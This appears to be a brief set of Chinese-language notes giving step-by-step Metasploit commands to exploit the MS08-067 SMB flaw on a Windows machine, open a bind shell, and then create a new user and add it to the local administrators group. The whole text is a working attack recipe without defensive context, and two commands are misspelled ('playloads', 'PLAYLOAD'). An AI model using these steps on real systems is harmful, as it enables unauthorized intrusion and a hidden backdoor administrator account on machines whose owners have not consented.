1. 进入msf。
2. show exploits。
3. use exploit/windows/smb/ms08_067_netapi。
4. show playloads。
5. set PLAYLOAD windows/shell/bind_tcp
6. set RHOST ip地址等选项。
7. set target 41。
8. exploit。

得到cmd命令行：

添加用户、提权：

1. net user newuser 123456 /add
2. net localgroup administrators newuser /add